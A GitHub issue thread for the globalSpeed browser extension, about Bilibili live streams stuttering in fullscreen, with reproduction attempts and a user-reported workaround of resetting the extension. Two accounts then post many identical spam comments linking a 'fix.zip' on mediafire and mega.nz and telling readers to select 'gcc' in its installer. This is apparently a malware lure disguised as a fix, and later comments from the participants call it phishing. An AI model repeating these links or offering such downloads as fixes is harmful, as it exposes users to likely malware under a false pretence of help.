### ISSUE TITLE
哔哩哔哩直播，打开全屏后，帧数越来越低，变卡，完全暂停后又会刷新恢复继续变卡

### ISSUE THREAD

**Issue by xxxqq55** [polywock/globalSpeed#557]
已近排除其他插件，只开起本插件才会出现问题，而且通过移动鼠标，敲击键盘能暂时恢复，然后继续变卡
![Uploading 屏幕截图 2024-08-23 180520.png…]()

**Comment by LifeJustDLC** [comment]
Trying to reproduce... Could you offer some extra information like how long should I watch  to make it happen. BTW, your image seems not uploaded completely.

**Comment by xxxqq55** [comment]
![屏幕截图 2024-08-23 180520](https://github.com/user-attachments/assets/2e1ca98c-d87c-4b9d-9f8d-c612e0f54fc4)


> Trying to reproduce... Could you offer some extra information like how long should I watch to make it happen. BTW, your image seems not uploaded completely.

打开全屏后，10秒里大概就会触发，有小概率不会出现

**Comment by LifeJustDLC** [comment]
I can't reproduce so far on any of my environment: chrome, edge, firefox on both win10 and mac. maybe polywock have some clue. (FYI, I tried several streams from valorant and 悟空黑神话, which should have a enough bitrate)

**Comment by xxxqq55** [comment]
> Trying to reproduce... Could you offer some extra information like how long should I watch to make it happen. BTW, your image seems not uploaded completely.

我上传了一个视频展现情况没有录制到我的鼠标，画质不太好，希望不要介意
https://www.bilibili.com/video/BV1RjWSeUEhX/
不知道你可不可以看到视频

**Comment by xxxqq55** [comment]
通过重制插件，好像解决了？暂时还没出现问题

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by xxxqq55** [comment]
![屏幕截图 2024-08-28 232839](https://github.com/user-attachments/assets/10898686-8a03-462b-9842-a08fe42e4f27)
这是发生什么事了？一直接受到这种邮件，而且我还看不到他的评论，让我很困惑。这是病毒吗？

**Comment by LifeJustDLC** [comment]
@xxxqq55
估计是钓鱼网站刷屏，举报了

**Comment by polywock** [comment]
@xxxqq55 @LifeJustDLC  Wow! Scary to see that here. Was the email from an official Github account?

**Comment by xxxqq55** [comment]
@polywock yes

**Comment by LifeJustDLC** [comment]
@polywock It looks like this:
![Screenshot_2024-08-30-02-55-26-183_com.microsoft.office.outlook.jpg](https://github.com/user-attachments/assets/f61e6f6e-175d-4446-8fe3-a8ff6ba5a1c9)
